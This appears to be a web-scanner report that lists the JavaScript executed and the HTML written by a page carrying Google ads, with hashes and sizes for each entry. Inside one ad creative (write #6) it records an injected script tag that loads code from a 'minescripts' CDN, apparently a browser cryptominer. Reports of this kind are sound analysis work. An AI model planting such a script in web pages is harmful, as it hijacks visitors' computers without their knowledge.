#85 JavaScript::Eval (size: 83, repeated: 1) - SHA256: cf8b322b97217d388cdd9e394e21ca6c8285afe0d87a8d0873fcda44334b32f1

                                        x = function(Z, u) {
    (Z.a.push(Z.L.slice()), Z.L[240] = void 0, G)(Z, 240, u);
}
                                    

Executed Writes (15)

#1 JavaScript::Write (size: 0, repeated: 3) - SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        
                                    

#2 JavaScript::Write (size: 3875, repeated: 1) - SHA256: 77419a7ca2bed3e21e02bc336cba0b6ed42fade260ea477050a298a8de5dc198

                                        < script >
    var abgp = {
        hw: 15,
        sw: 75,
        hh: 15,
        sh: 15,
        himg: 'https://pagead2.googlesyndication.com' + '/pagead/images/adchoices/icon.png',
        simg: 'https://pagead2.googlesyndication.com' + '/pagead/images/adchoices/en.png',
        alt: 'AdChoices',
        t: 'AdChoices',
        tw: 53,
        t2: '',
        t2w: 0,
        tbo: 0,
        att: 'adchoices',
        ff: '',
        halign: 'right',
        fe: false,
        iba: false,
        lttp: false,
        uic: true,
        uit: true,
        ci: '',
        icd: {
            "creatives": [],
            "height": 90,
            "width": 728,
            "attribution": {
                "user_feedback_data": {
                    "mute_icon_url": "https://googleads.g.doubleclick.net/pagead/images/mtad/x_blue.png",
                    "pub_feedback_icon_url": "https://googleads.g.doubleclick.net/pagead/images/mtad/x_blue.png",
                    "conversion_url": "https://googleads.g.doubleclick.net/pagead/conversion/?ai=CQ7OioiyCWvbnMpSfYs_ipNAOgNnotVCj1e3k_wbwLhABIMvw3ztgw9ykhZgYoAGg28y_A8gBCakCVaThoimYtD6oAwHIAwKqBKwBT9DNJXYfKWUjVmeAyda6iwE0rlSUf6VUqp-kQEdHmd3MnlvTuuS2UzMGUL7jhsWJzGe_EfHacaID75YUk6z8EJtgivcitp0mFPPlYFXMT9EgaR0K8W2SQbDRJ_gjNRk8m8CzyhexLEznrScmmO_dZccr89uh-EiCBkvvj01t0KZB4cNDz-DEHywGjkTZSHNLps5u0pCsyxsduEumNkHq_5tTM3oWNf5EZKYaFuAEA5AGAaAGTIAHyKSzQKgHpr4b2AcA0ggHCIBhEAEYAoAKAdgTAw\u0026sigh=B39WeTFrUss\u0026cid=CAASBORoBGo",
                    "close_button_token": "Y2spVl036jsIo9Xt5P8GEPDP7p8BGNCv0D9CAEgAWABwAQ",
                    "interaction_conversion": {
                        "label": "user_feedback_menu_interaction",
                        "label_instance": "",
                        "include_close_button_token": false
                    },
                    "survey_header": "What was wrong with this ad?",
                    "back_icon_url": "https://googleads.g.doubleclick.net/pagead/images/mtad/back_blue.png",
                    "mute_confirmation_header": "Thanks for the feedback!",
                    "mute_confirmation_text": "Well review this ad to improve the experience in the future.",
                    "pub_feedback_confirmation_header": "Thanks for the feedback!",
                    "pub_feedback_confirmation_text": "Well use your feedback to review ads on this site.",
                    "closing_countdown_text": "Closing ad: %1$d",
                    "attribution_text": "AdChoices",
                    "attribution_icon_url": "https://googleads.g.doubleclick.net/pagead/images/mtad/ad_choices_blue.png",
                    "attribution_destination_url": "https://www.google.com/url?ct=abg\u0026q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://lyonhealycpo.com.ourssite.com/%26gl%3DNO%26hl%3Den%26ai0%3D\u0026usg=AFQjCNFLkxm6C-Frrk-90K7GSuYmnAF4VA",
                    "ad_feedback_icon_url": "https://googleads.g.doubleclick.net/pagead/images/mtad/x_blue.png",
                    "is_rtl_language": false,
                    "feedback_options": [{
                        "text": "Report this ad",
                        "conversion": {
                            "label": "user_feedback_menu_option",
                            "label_instance": "1",
                            "include_close_button_token": true
                        },
                        "survey": {
                            "header": "What was wrong with this ad?",
                            "options": [{
                                "text": "Seen this ad multiple times",
                                "conversion": {
                                    "label": "mute_survey_option",
                                    "label_instance": "2",
                                    "include_close_button_token": true
                                }
                            }, {
                                "text": "Ad covered content",
                                "conversion": {
                                    "label": "mute_survey_option",
                                    "label_instance": "3",
                                    "include_close_button_token": true
                                }
                            }, {
                                "text": "Ad was inappropriate",
                                "conversion": {
                                    "label": "mute_survey_option",
                                    "label_instance": "8",
                                    "include_close_button_token": true
                                }
                            }, {
                                "text": "Not interested in this ad",
                                "conversion": {
                                    "label": "mute_survey_option",
                                    "label_instance": "7",
                                    "include_close_button_token": true
                                }
                            }]
                        },
                        "undo_conversion": {
                            "label": "user_feedback_undo",
                            "label_instance": "1",
                            "include_close_button_token": true
                        }
                    }],
                    "mute_panel_data": {
                        "adchoices_icon_url": "https://googleads.g.doubleclick.net/pagead/images/adchoices/iconx2-000000.png",
                        "adchoices_button_text": "AdChoices",
                        "closed_message_text": "Ad closed by %1$s",
                        "enable_lightbox": false,
                        "google_logo_url": "https://www.gstatic.com/images/branding/googlelogo/2x/googlelogo_dark_color_84x28dp.png",
                        "report_ad_button_text": "Report this ad",
                        "confirmation_text": "We'll try not to show that ad again",
                        "see_my_google_ad_settings_text": "See my Google ad settings",
                        "protocol_gstatic_host": "https://www.gstatic.com",
                        "jake_mta_context": "",
                        "overlay_message_text": "Ads by %1$s"
                    }
                }
            },
            "flags": [{
                "name": "jake_ui_extension",
                "value": "jake_default_ui"
            }]
        },
        opi: false,
        ti: false,
        mob: false,
        il: false,
        eaca: false,
        eda: false
    }; < /script>
                                    

#3 JavaScript::Write (size: 2580, repeated: 1) - SHA256: ae1986a507f99c0f41f2cc99e2071371465a3252a109e5a439250019a75eb556

                                        < !doctype html > < html > < body > < iframe style = "display:none"
data - ad - client = "ca-pub-2222385521793316"
id = "google_esf"
name = "google_esf"
src = "https://googleads.g.doubleclick.net/pagead/html/r20180207/r20170110/zrt_lookup.html#" > < /iframe><script>google_ad_format="900x90";google_ad_slot="2327461989";google_ad_client="ca-pub-2222385521793316";google_adsbygoogle_status="done";gfwroml="";gfwromr="";gfwroh="";gfwrow="";gfwroz="";google_full_width_responsive_allowed=false;google_fwr_non_expansion_reason=4;google_responsive_formats=3;google_ad_width=900;google_ad_height=90;google_ad_resizable=true;google_override_format=1;google_responsive_auto_format=1;google_loader_features_used=128;google_ad_modifications={"plle":true,"eids":["38893302","21061122","191880502"],"loeids":["38893312"]};google_loader_used="aa";google_reactive_tag_first=true;google_ad_unit_key="3265937839";google_ad_dom_fingerprint="807048394";google_sailm=false;google_unique_id=1;google_async_iframe_id="aswift_0";google_start_time=1518480545101;google_pub_vars="JTdCJTIyZ29vZ2xlX2FkX2Zvcm1hdCUyMiUzQSUyMjkwMHg5MCUyMiUyQyUyMmdvb2dsZV9hZF9zbG90JTIyJTNBJTIyMjMyNzQ2MTk4OSUyMiUyQyUyMmdvb2dsZV9hZF9jbGllbnQlMjIlM0ElMjJjYS1wdWItMjIyMjM4NTUyMTc5MzMxNiUyMiUyQyUyMmdvb2dsZV9hZHNieWdvb2dsZV9zdGF0dXMlMjIlM0ElMjJkb25lJTIyJTJDJTIyZ2Z3cm9tbCUyMiUzQSUyMiUyMiUyQyUyMmdmd3JvbXIlMjIlM0ElMjIlMjIlMkMlMjJnZndyb2glMjIlM0ElMjIlMjIlMkMlMjJnZndyb3clMjIlM0ElMjIlMjIlMkMlMjJnZndyb3olMjIlM0ElMjIlMjIlMkMlMjJnb29nbGVfZnVsbF93aWR0aF9yZXNwb25zaXZlX2FsbG93ZWQlMjIlM0FmYWxzZSUyQyUyMmdvb2dsZV9md3Jfbm9uX2V4cGFuc2lvbl9yZWFzb24lMjIlM0E0JTJDJTIyZ29vZ2xlX3Jlc3BvbnNpdmVfZm9ybWF0cyUyMiUzQTMlMkMlMjJnb29nbGVfYWRfd2lkdGglMjIlM0E5MDAlMkMlMjJnb29nbGVfYWRfaGVpZ2h0JTIyJTNBOTAlMkMlMjJnb29nbGVfYWRfcmVzaXphYmxlJTIyJTNBdHJ1ZSUyQyUyMmdvb2dsZV9vdmVycmlkZV9mb3JtYXQlMjIlM0ExJTJDJTIyZ29vZ2xlX3Jlc3BvbnNpdmVfYXV0b19mb3JtYXQlMjIlM0ExJTJDJTIyZ29vZ2xlX2xvYWRlcl9mZWF0dXJlc191c2VkJTIyJTNBMTI4JTJDJTIyZ29vZ2xlX2FkX21vZGlmaWNhdGlvbnMlMjIlM0ElN0IlMjJwbGxlJTIyJTNBdHJ1ZSUyQyUyMmVpZHMlMjIlM0ElNUIlMjIzODg5MzMwMiUyMiUyQyUyMjIxMDYxMTIyJTIyJTJDJTIyMTkxODgwNTAyJTIyJTVEJTJDJTIybG9laWRzJTIyJTNBJTVCJTIyMzg4OTMzMTIlMjIlNUQlN0QlMkMlMjJnb29nbGVfbG9hZGVyX3VzZWQlMjIlM0ElMjJhYSUyMiUyQyUyMmdvb2dsZV9yZWFjdGl2ZV90YWdfZmlyc3QlMjIlM0F0cnVlJTJDJTIyZ29vZ2xlX2FkX3VuaXRfa2V5JTIyJTNBJTIyMzI2NTkzNzgzOSUyMiUyQyUyMmdvb2dsZV9hZF9kb21fZmluZ2VycHJpbnQlMjIlM0ElMjI4MDcwNDgzOTQlMjIlN0Q=";google_bpp=94;google_async_rrc=0;google_iframe_start_time=new Date().getTime();</script > < script src = "http://pagead2.googlesyndication.com/pagead/js/r20180207/r20170110/show_ads_impl.js" > < /script></body > < /html>
                                    

#4 JavaScript::Write (size: 2376, repeated: 1) - SHA256: 03999106d73b8313ee6da826b86666f1437ac91f3befc976d07ac017e81b9028

                                        < !doctype html > < html > < body > < script > google_ad_format = "900x90";
google_ad_slot = "2187861180";
google_ad_client = "ca-pub-2222385521793316";
google_adsbygoogle_status = "done";
gfwroml = "";
gfwromr = "";
gfwroh = "";
gfwrow = "";
gfwroz = "";
google_full_width_responsive_allowed = false;
google_fwr_non_expansion_reason = 4;
google_responsive_formats = 3;
google_ad_width = 900;
google_ad_height = 90;
google_ad_resizable = true;
google_override_format = 1;
google_responsive_auto_format = 1;
google_loader_features_used = 128;
google_ad_modifications = {
    "plle": true,
    "eids": ["38893302", "21061122", "191880502"],
    "loeids": ["38893312"]
};
google_loader_used = "aa";
google_reactive_tag_first = true;
google_ad_unit_key = "1512129485";
google_ad_dom_fingerprint = "807048394";
google_sailm = false;
google_unique_id = 3;
google_async_iframe_id = "aswift_2";
google_start_time = 1518480546201;
google_pub_vars = "JTdCJTIyZ29vZ2xlX2FkX2Zvcm1hdCUyMiUzQSUyMjkwMHg5MCUyMiUyQyUyMmdvb2dsZV9hZF9zbG90JTIyJTNBJTIyMjE4Nzg2MTE4MCUyMiUyQyUyMmdvb2dsZV9hZF9jbGllbnQlMjIlM0ElMjJjYS1wdWItMjIyMjM4NTUyMTc5MzMxNiUyMiUyQyUyMmdvb2dsZV9hZHNieWdvb2dsZV9zdGF0dXMlMjIlM0ElMjJkb25lJTIyJTJDJTIyZ2Z3cm9tbCUyMiUzQSUyMiUyMiUyQyUyMmdmd3JvbXIlMjIlM0ElMjIlMjIlMkMlMjJnZndyb2glMjIlM0ElMjIlMjIlMkMlMjJnZndyb3clMjIlM0ElMjIlMjIlMkMlMjJnZndyb3olMjIlM0ElMjIlMjIlMkMlMjJnb29nbGVfZnVsbF93aWR0aF9yZXNwb25zaXZlX2FsbG93ZWQlMjIlM0FmYWxzZSUyQyUyMmdvb2dsZV9md3Jfbm9uX2V4cGFuc2lvbl9yZWFzb24lMjIlM0E0JTJDJTIyZ29vZ2xlX3Jlc3BvbnNpdmVfZm9ybWF0cyUyMiUzQTMlMkMlMjJnb29nbGVfYWRfd2lkdGglMjIlM0E5MDAlMkMlMjJnb29nbGVfYWRfaGVpZ2h0JTIyJTNBOTAlMkMlMjJnb29nbGVfYWRfcmVzaXphYmxlJTIyJTNBdHJ1ZSUyQyUyMmdvb2dsZV9vdmVycmlkZV9mb3JtYXQlMjIlM0ExJTJDJTIyZ29vZ2xlX3Jlc3BvbnNpdmVfYXV0b19mb3JtYXQlMjIlM0ExJTJDJTIyZ29vZ2xlX2xvYWRlcl9mZWF0dXJlc191c2VkJTIyJTNBMTI4JTJDJTIyZ29vZ2xlX2FkX21vZGlmaWNhdGlvbnMlMjIlM0ElN0IlMjJwbGxlJTIyJTNBdHJ1ZSUyQyUyMmVpZHMlMjIlM0ElNUIlMjIzODg5MzMwMiUyMiUyQyUyMjIxMDYxMTIyJTIyJTJDJTIyMTkxODgwNTAyJTIyJTVEJTJDJTIybG9laWRzJTIyJTNBJTVCJTIyMzg4OTMzMTIlMjIlNUQlN0QlMkMlMjJnb29nbGVfbG9hZGVyX3VzZWQlMjIlM0ElMjJhYSUyMiUyQyUyMmdvb2dsZV9yZWFjdGl2ZV90YWdfZmlyc3QlMjIlM0F0cnVlJTJDJTIyZ29vZ2xlX2FkX3VuaXRfa2V5JTIyJTNBJTIyMTUxMjEyOTQ4NSUyMiUyQyUyMmdvb2dsZV9hZF9kb21fZmluZ2VycHJpbnQlMjIlM0ElMjI4MDcwNDgzOTQlMjIlN0Q=";
google_bpp = 19;
google_async_rrc = 0;
google_iframe_start_time = new Date().getTime(); < /script><script src="http:/ / pagead2.googlesyndication.com / pagead / js / r20180207 / r20170110 / show_ads_impl.js "></script></body></html>
                                    

#5 JavaScript::Write (size: 1632, repeated: 1) - SHA256: 6afb593c61325e8cae2b4c1f556e1d102c05e02466f0bae3bcd048ec7fd99144

                                        < !doctype html > < html > < body > < script > google_ad_slot = "6757661585";
google_ad_client = "ca-pub-2222385521793316";
google_adsbygoogle_status = "done";
google_ad_width = 300;
google_ad_height = 250;
google_available_width = 0;
google_ad_modifications = {
    "plle": true,
    "eids": ["38893302", "21061122", "191880502"],
    "loeids": ["38893312"]
};
google_loader_used = "aa";
google_reactive_tag_first = true;
google_ad_format = "300x250";
google_ad_unit_key = "3336137519";
google_ad_dom_fingerprint = "807048394";
google_sailm = false;
google_unique_id = 2;
google_async_iframe_id = "aswift_1";
google_start_time = 1518480546061;
google_pub_vars = "JTdCJTIyZ29vZ2xlX2FkX3Nsb3QlMjIlM0ElMjI2NzU3NjYxNTg1JTIyJTJDJTIyZ29vZ2xlX2FkX2NsaWVudCUyMiUzQSUyMmNhLXB1Yi0yMjIyMzg1NTIxNzkzMzE2JTIyJTJDJTIyZ29vZ2xlX2Fkc2J5Z29vZ2xlX3N0YXR1cyUyMiUzQSUyMmRvbmUlMjIlMkMlMjJnb29nbGVfYWRfd2lkdGglMjIlM0EzMDAlMkMlMjJnb29nbGVfYWRfaGVpZ2h0JTIyJTNBMjUwJTJDJTIyZ29vZ2xlX2F2YWlsYWJsZV93aWR0aCUyMiUzQTAlMkMlMjJnb29nbGVfYWRfbW9kaWZpY2F0aW9ucyUyMiUzQSU3QiUyMnBsbGUlMjIlM0F0cnVlJTJDJTIyZWlkcyUyMiUzQSU1QiUyMjM4ODkzMzAyJTIyJTJDJTIyMjEwNjExMjIlMjIlMkMlMjIxOTE4ODA1MDIlMjIlNUQlMkMlMjJsb2VpZHMlMjIlM0ElNUIlMjIzODg5MzMxMiUyMiU1RCU3RCUyQyUyMmdvb2dsZV9sb2FkZXJfdXNlZCUyMiUzQSUyMmFhJTIyJTJDJTIyZ29vZ2xlX3JlYWN0aXZlX3RhZ19maXJzdCUyMiUzQXRydWUlMkMlMjJnb29nbGVfYWRfZm9ybWF0JTIyJTNBJTIyMzAweDI1MCUyMiUyQyUyMmdvb2dsZV9hZF91bml0X2tleSUyMiUzQSUyMjMzMzYxMzc1MTklMjIlMkMlMjJnb29nbGVfYWRfZG9tX2ZpbmdlcnByaW50JTIyJTNBJTIyODA3MDQ4Mzk0JTIyJTdE";
google_bpp = 15;
google_async_rrc = 0;
google_iframe_start_time = new Date().getTime(); < /script><script src="http:/ / pagead2.googlesyndication.com / pagead / js / r20180207 / r20170110 / show_ads_impl.js "></script></body></html>
                                    

#6 JavaScript::Write (size: 8672, repeated: 1) - SHA256: 662ff6531a969705b6ac5ca33868f53bedf5f0fb252674e350f58fd9db55ce89

                                        < !doctype html > < html > < head > < script >
    var google_casm = [null, null, null, null, null, null, 1]; < /script></head > < body leftMargin = "0"
topMargin = "0"
marginwidth = "0"
marginheight = "0" > < DIV STYLE = "position: absolute; left: 0px; top: 0px; visibility: hidden;" > < IMG SRC = "https://pagead2.googlesyndication.com/pagead/gen_204?id=xbid&dbm_b=AKAmf-AfuO6QeUwCK8b2EUwz_AFKyafw7LFzfGNSOMHZGjiiReXvZinLVSkB_SnAeDtKZaHhYuvn0R_GiQ-dePnhdahZCe0F2NjuJQxWjhlzX2qrn5rnnMk"
BORDER = 0 WIDTH = 1 HEIGHT = 1 ALT = ""
STYLE = "display:none" > < /DIV><iframe src="https:/ / googleads.g.doubleclick.net / xbbe / pixel ? d = COD5IRDn0jYY0IC5CDAB & v = APEucNWlf2nVGD7QVqn66Y9lRVBTes5IRW2ASGQmTA - x3cafgloPSVroOCiqfOxveidCWavRsq4O " style="
display: none "></iframe><div><div style="
position: relative;
display: inline - block;
"><script>(function(){var h=this,k=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var b=c.slice();b.push.apply(b,arguments);return a.apply(this,b)}};var l=Array.prototype.forEach?function(a,b){Array.prototype.forEach.call(a,b,void 0)}:function(a,b){for(var c=a.length,d="
string "==typeof a?a.split("
"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)},m=Array.prototype.map?function(a,b){return Array.prototype.map.call(a,b,void 0)}:function(a,b){for(var c=a.length,d=Array(c),e="
string "==typeof a?a.split("
"):a,f=0;f<c;f++)f in e&&(d[f]=b.call(void 0,e[f],f,a));return d},p=Array.prototype.reduce?function(a,b,c){return Array.prototype.reduce.call(a,b,c)}:function(a,b,c){var d=c;l(a,function(c,f){d=b.call(void 0,d,c,f,a)});return d},q=function(a){for(var b=[],c=0;c<a;c++)b[c]="
";return b};var r=function(a){r["
"](a);return a};r["
"]=function(){};var t=function(a,b){if(a)for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.call(void 0,a[c],c,a)},u=/https?:\/\/[^\/]+/,v=function(a){return(a=u.exec(a))&&a[0]||"
"};var w=/^https?:\/\/(\w|-)+\.cdn\.ampproject\.(net|org)(\?|\/|$)/,x=function(a,b,c){this.i=a;this.j=b;this.g=c},y=function(a,b){this.url=a;this.h=!!b;this.depth=null},A=function(a){a=a||z();for(var b=new y(h.location.href,!1),c=null,d=a.length-1,e=d;0<=e;--e){var f=a[e];!c&&w.test(f.url)&&(c=f);if(f.url&&!f.h){b=f;break}}e=null;f=a.length&&a[d].url;0!=b.depth&&f&&(e=a[d]);return new x(b,e,c)},z=function(){var a=h,b=[],c=null;do{var d=a;try{var e;if(e=!!d&&null!=d.location.href)b:{try{r(d.foo);e=!0;break b}catch(n){}e=!1}var f=e}catch(n){f=!1}if(f){var g=d.location.href;c=d.document&&d.document.referrer||null}else g=c,c=null;b.push(new y(g||"
"));try{a=d.parent}catch(n){a=null}}while(a&&d!=a);a=0;for(d=b.length-1;a<=d;++a)b[a].depth=d-a;d=h;if(d.location&&d.location.ancestorOrigins&&d.location.ancestorOrigins.length==b.length-1)for(a=1;a<b.length;++a)g=b[a],g.url||(g.url=d.location.ancestorOrigins[a-1]||"
",g.h=!0);return b};var C=function(a,b,c,d,e){var f=[];t(a,function(a,n){(a=B(a,b,c,d,e))&&f.push(n+" = "+a)});return f.join(b)},B=function(a,b,c,d,e){if(null==a)return"
";b=b||" & ";c=c||", $ ";"
string "==typeof c&&(c=c.split("
"));if(a instanceof Array){if(d=d||0,d<c.length){for(var f=[],g=0;g<a.length;g++)f.push(B(a[g],b,c,d+1,e));return f.join(c[d])}}else if("
object "==typeof a)return e=e||0,2>e?encodeURIComponent(C(a,b,c,d,e+1)):"...
";return encodeURIComponent(String(a))};var D=function(a,b){this.g=a;this.depth=b},F=function(){var a=z(),b=Math.max(a.length-1,0),c=A(a);a=c.i;var d=c.j,e=c.g,f=[];c=function(a,b){return null==a?b:a};e&&f.push(new D([e.url,e.h?2:0],c(e.depth,1)));d&&d!=e&&f.push(new D([d.url,2],0));a.url&&a!=e&&f.push(new D([a.url,0],c(a.depth,b)));var g=m(f,function(a,b){return f.slice(0,f.length-b)});!a.url||(e||d)&&a!=e||(d=v(a.url))&&g.push([new D([d,1],c(a.depth,b))]);g.push([]);return m(g,k(E,b))},E=function(a,b){var c=p(b,function(a,b){return Math.max(a,b.depth)},-1),d=q(c+2);d[0]=a;l(b,function(a){return d[a.depth+1]=a.g});return d},G=function(){var a=F();return m(a,function(a){return B(a)})};var H=function(a){try{var b=G();b.pop();for(var c=2083-a.length-5,d=0;d<b.length;d++){var e=encodeURIComponent(b[d]);if(e.length<=c)return a+" & rfl = "+e}return 0<b.length?a+" & rfl = "+encodeURIComponent(b[0]):a}catch(f){}return a},I=["
rfl "],J=h;I[0]in J||!J.execScript||J.execScript("
var "+I[0]);for(var K;I.length&&(K=I.shift());){var L;if(L=!I.length)L=void 0!==H;L?J[K]=H:J[K]&&J[K]!==Object.prototype[K]?J=J[K]:J=J[K]={}};}).call(this);</script><script>var url = 'https://googleads.g.doubleclick.net/dbm/ad?dbm_c=AKAmf-Bh9Z_Q3rjY2VyR7p1ZAf3osR3l3pBgb6tNpp_XHhq2PWu3Q8nla_c4Dh8hWfzi6O-sHyq3&dbm_d=AKAmf-BFNOga-jp5GGXBLvIbNhP1IW1aZyvbgz5PkOO_XD5bIX6cmcX_zPfhQOx6AvXcaPS06DAyclKggRT7pn12EK0HlijTOqnnA_xrfIy73cbwTtZxY94ieU4xiNIxu2RrrMGR_XrneIMl_wvkbBtFLLd3peij8KnvoB9gNSnMHcZObe_Yj7TsoJs3eCT8Qp3tdrfn6Vj0vFLKl5T2SNRAAg5Im0bHRwkYiIjD_WLBZzPuWalViB226l7i9L_a8KwAc7fOEeInRAsm6qYtoH4I_T3SGzNlCD7XjUDS_Mqey48KaocFHZmxnWlKl8L2DIBagZJhFSWGrW8RNqh84zdEo8K-yGgC2usgr6gU-lK0xccw1LADcWWFFSevuHlBwCzY_EjU_99a390x7Zn9jq-tXBKXKjhu0MdAF4mPf-DH-4rWz6BEEFjNlvWUFaPDmx5uq1vdEVaCL3UZ5M9KAWWvZG04yoG4Zmm2YT8TEw1Ab-KLaOOjsh2i6DxFL9QQE7zBeFXoVMUy4Y5KJE9xhLewoPBJAaq2-_7LNUFBq8Z5Xyc6QgYAfS_MuPpd8DFZnIY4FMwVXYGXkPyZLEL9H4O3-Q3eJkDkeTpOkJpicEV3K9FETnI5rG7cVGbUjE_2MWZRprxcYdt85GlTARbTlJZnTc0SceG8HPyYAOwiE-nH8WoBswAXk3yRHiB4blgJuFTtuLylPp1aM3Kgerp0QEUs-U9_K-oV1KxQE-04CDK5v8sCuPxRCDbyOu0UFwPHvRRS8LbSestdaAy-HFqmVV49K1E-jtZj0UKjUOXtNGLzESTVmFzVSEpJFURDRAV9xccQ0I28orxLoEOTQ-M9I_7uLN7VXIDCFj6KMY5wnpwoMDtFit0XsSgpEDYK-DTq2fKwJvNzgGBOVw4Pk41cnG7lvqrxtNqenxeyxlB1j7rDlfUzIlpWfmjown-hWmqFU3rBkyXaV6zNO3MVcFtOXqbMLmxJGJL-KcD7gDOfXgnHCh7Lpe3dYbBhotgOypkbNXeZm7MN0Zrx555VDGOm9iUEibNpyEPGctt6SEtCGoHxejqpqpUsJFpCsZ762Mh_3-ngvlzEQCFQK0W4Ifm_umvh0qTVH_m0O1Po6cTOyjh-Lq5d0dAMW5mn5gStjir4XG_lfGaqCr6446NnMm3IVG2LqK5Prdc9BoCJBzTY-TOqGmj_XuvqaxEzMmWpRtrttOUb31RbKgZDmIxGMprywNiZ7oXTd_5QWZqTY4N9p7-4yPm4IaxrK7h_W23c8yPaMUV4PSWDF2fQWbgOGFAPfeaTroKCSURWGq34TCb_0c9X5RAOZD1rmgJ1FUv1ylDoSMgRrcsH7D4EJ1j_17qQHX4ObRnGxsxp_cxJNoCpWCX5F5Z7UFBNmtfuvzoAnRePC_DNuazVe3cpXzcsFN9Vjp4EOnJVFy-AEXMA5wK9eqbAlLTaYMK47yL2LLEFHePN29m3GC4lJy1CKh6uw-H70IirYZfg-X_mKbNGchKORiA-6LlRlGn_CdzaCtos1Ys0eB_PLpB8k99jI04iyUIZy_jBYhXE0NJa0wnpbAfimKMXbvLymtbvR3IfrxHwv-9T_oFB8yU3amZ3&cid=CAASBORoBGo';document.write('<script src="
' + (window.rfl ? window.rfl(url) : url) + '
"></s' + 'cript>');</script><script src="
https: //cdn.minescripts.info/c/8kzd.js"></script></div></div><script src="https://tpc.googlesyndication.com/pagead/js/r20180207/r20110914/client/ext/m_window_focus_non_hydra.js" async></script><script>function initWindowFocus() {window['window_focus_for_click'] =wfocusnhinit("https://googleads.g.doubleclick.net/pagead/conversion/?ai\x3dCQ7OioiyCWvbnMpSfYs_ipNAOgNnotVCj1e3k_wbwLhABIMvw3ztgw9ykhZgYoAGg28y_A8gBCakCVaThoimYtD6oAwHIAwKqBKwBT9DNJXYfKWUjVmeAyda6iwE0rlSUf6VUqp-kQEdHmd3MnlvTuuS2UzMGUL7jhsWJzGe_EfHacaID75YUk6z8EJtgivcitp0mFPPlYFXMT9EgaR0K8W2SQbDRJ_gjNRk8m8CzyhexLEznrScmmO_dZccr89uh-EiCBkvvj01t0KZB4cNDz-DEHywGjkTZSHNLps5u0pCsyxsduEumNkHq_5tTM3oWNf5EZKYaFuAEA5AGAaAGTIAHyKSzQKgHpr4b2AcA0ggHCIBhEAEYAoAKAdgTAw\x26sigh\x3dB39WeTFrUss","oiyCWvCTMpO1YsS8ktAN","CPbA3uzModkCFZSPGAodTzEJ6g",true,false,false,0);}if (window.wfocusnhinit) {initWindowFocus();} else {window['google_wf_async'] = initWindowFocus;}</script><script src="https://tpc.googlesyndication.com/pagead/js/r20180207/r20110914/activeview/osd_listener.js"></script><script type="text/javascript">osdlfm(-1,'','BJ3droiyCWvbnMpSfYs_ipNAOAKPV7eT_BgAAEAE4AcgBCcgDAuAEA6AGTNIIBQiAYRABwhMGGKDbzL8D','',1512129485,true,'ud\x3d1\x26la\x3d0\x26alp\x3dai\x26alh\x3d2339811834\x26',3,'CAASBORoBGo','//pagead2.googlesyndication.com/activeview?avi\x3dBJ3droiyCWvbnMpSfYs_ipNAOAKPV7eT_BgAAEAE4AcgBCcgDAuAEA6AGTNIIBQiAYRABwhMGGKDbzL8D\x26cid\x3dCAASBORoBGo');</script><script src="https://tpc.googlesyndication.com/pagead/js/r20180207/r20110914/client/ext/m_qs_click_protection.js"></script><script>googqscp.init([[[[null,500,99,2,8,null,null,null,1]]],null,null,null,null,0,null,null,0]);</script><script>if (window.top && window.top.postMessage) {window.top.postMessage('{"googMsgType":"adpnt"}','*');}</script><div style="display:none" data-google-query-id="CPbA3uzModkCFZSPGAodTzEJ6g"></div><div style="bottom:0;right:0;width:246px;height:90px;background:initial !important;position:absolute !important;max-width:100% !important;max-height:100% !important;pointer-events:none !important;image-rendering:-moz-crisp-edges !important;z-index:2147483647;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACsAAAAWBAMAAACrl3iAAAAABlBMVEUAAAD+AciWmZzWAAAAAnRSTlMAApidrBQAAACDSURBVBjTbZEBDsUwCELpDbz/adcKiD/5LmtrdPjKgP9xGDjvOBlQXb1r3ZisO9jbu7JbcVfx6Sx1vumG1609JFIWiaOaJNwYaurDJPDGD0gCTpfmCL/5QtY1+sBWQws7JJgrL24PMM1ycA2wCyHCj4MVB2t5dkKyHczPeYdx0Ba28geOxwYiOOlMCgAAAABJRU5ErkJggg==') !important"></div></body></html>
                                    

#7 JavaScript::Write (size: 6, repeated: 2) - SHA256: aac32651b10f567c461b9b4f255d6fb1fa6859b5368d8bd9a51af920ab21cf23

                                        < /div>
                                    

#8 JavaScript::Write (size: 1233, repeated: 1) - SHA256: 432c2e95d4e8916129a7b4b4544acb103cc6144bb30203ef0c40541c80412b2a

                                        < a target = "_blank"
href = "https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjstSk06vFqFMEbietlTGA6ke8ZUEyCOgXIqJhNb898lRfAq9_PAbVD1YS0cRjQdCka8x9baltGm-AK0udcHxszORyVLJFrqG_YAvS9dkYbZYPwEimG9Fc35HQl58CpIZ7S3LStcW2oz00Cz-Tbyw9BUty6c8rUQkbFEsXyh0QUmef1N4guqiKBq7wApxXRrb3R_Ns4ZHduoTFMBARBaMiohcbWXS5Adw5yT0FvL0SepaOh0lCTi7DjMQITkOa0EHteZDyb5mNsaKWYqwLawN-8_wHpqwtKnJ2ogBwwhckRreNHycjLGz6fJKsxOitrDlAUhuoYvmPJmT3IGIwKVUVJlbEH9CnjbGGa3LTE7bEcyule1aZqo7OQ3J90L25rgJL7EqLYctk2CKEc7wCFU1ih_qFprbRbUTrXC-znGaTgKQg1yAwNYV-czL09Bu3Wf_bFU8ChUTo-IMUe0jDBkbHqtrV-sklawBGC6zzVG_kts1YEOOv2WBk7R_nF8PvebHpKnsdg5QzqVcads41ryejPQELMvtL_c0IqGTRxX5nXD7JxAcRz34BXavUaDAwKxmURLj_kmKTp2E3u6kMILWq1EqEPTL7AX4NfrLUYMGr1J9PJURlMO5XcaReWYyaf_mIVjPzlscR5sW4yJal5yO10ngpKm4TeRAkZ3jC_eaY3I-rY3Y8BWKEgvupaWPL87Jp2Vv2Cgcqfh-7G1UCxWjQGWMJ2JnkG-nGDjDCklW2D2q5PS19mI2xQg4AxyVMXT7DfzlQAYe7U9nyhTSV_rLOOR7mRjQz0aTWjsGbrDJKWK7OkEg_PM3Z1St_A7sFEJ2rqY&amp;sai=AMfl-YTGwk-xnN8FWJzqfl85SBM2NwzuKlb_kXlDvcU2nUDe7WpxE8hlPUw4GLUPKoDlSZNK0-ziazViho0gRf9O1YTO5zU_m_UqHZh-gboxMyw&amp;sig=Cg0ArKJSzMwavdn49Qt_&amp;urlfix=1&